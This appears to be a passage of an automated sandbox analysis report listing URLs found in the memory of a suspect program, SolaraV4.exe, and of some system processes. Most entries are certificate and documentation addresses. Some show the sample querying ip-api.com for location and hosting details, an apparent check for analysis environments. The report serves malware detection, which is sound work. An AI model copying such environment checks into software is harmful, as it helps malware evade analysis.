SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digice
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: SolaraV4.exe, 00000003.00000003.2484662911.0000024132BDC000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2820968357.0000024132C0F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2614558332.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2681247933.0000024132C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: SIHClient.exe, 00000045.00000003.2669531355.00000270AE6A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: SIHClient.exe, 00000045.00000003.2669531355.00000270AE65A000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2668582901.00000270AE65A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a9c697a
Source: SIHClient.exe, 00000045.00000003.2669531355.00000270AE6A6000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2669531355.00000270AE65A000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2668582901.00000270AE65A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?ced3808
Source: SIHClient.exe, 00000045.00000002.3052583503.00000270AE612000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3051170798.00000270AE612000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2669272520.00000270AE612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a9c6
Source: SIHClient.exe, 00000045.00000003.2669531355.00000270AE68E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?ced3
Source: svchost.exe, 0000001C.00000003.2551414466.0000019851DD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: SolaraV4.exe, 00000003.00000003.2821308157.0000024132C10000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2496401358.0000024132C19000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2966812654.0000024132C0F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2642570776.0000024132C16000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2973890542.0000024132C13000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967549443.0000024132C10000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2666178291.0000024132C16000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2676535701.0000024132C16000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2820968357.0000024132C0F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2681247933.0000024132C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: SolaraV4.exe, 00000003.00000003.2821308157.0000024132C10000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2496401358.0000024132C19000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2966812654.0000024132C0F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2642570776.0000024132C16000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2973890542.0000024132C13000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967549443.0000024132C10000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2666178291.0000024132C16000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2676535701.0000024132C16000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2820968357.0000024132C0F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2681247933.0000024132C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/mail/
Source: SolaraV4.exe, 00000003.00000002.2975029437.0000024133330000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2496514190.0000024133041000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hostingr=
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hostingr=r
Source: SolaraV4.exe, 00000003.00000003.2614558332.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2681247933.0000024132C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://json.org
Source: powershell.exe, 0000000E.00000002.2740553094.000002D810074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2720390881.000001619B050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2798046644.00000161A989D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2798046644.00000161A975B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000043.00000002.2720390881.000001619AFCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000E.00000002.2684973162.000002D80022A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000E.00000002.2684973162.000002D800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2720390881.00000161996E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.2684973162.000002D80022A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: SolaraV4.exe, 00000003.00000002.2974839187.0000024133170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000043.00000002.2720390881.000001619ACE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000043.00000002.2720390881.000001619AFCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: SolaraV4.exe, 00000003.00000003.2668174875.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2679350163.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2658597789.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2614558332.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967612000.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2821702107.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2637075073.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2660879553.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2496514190.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 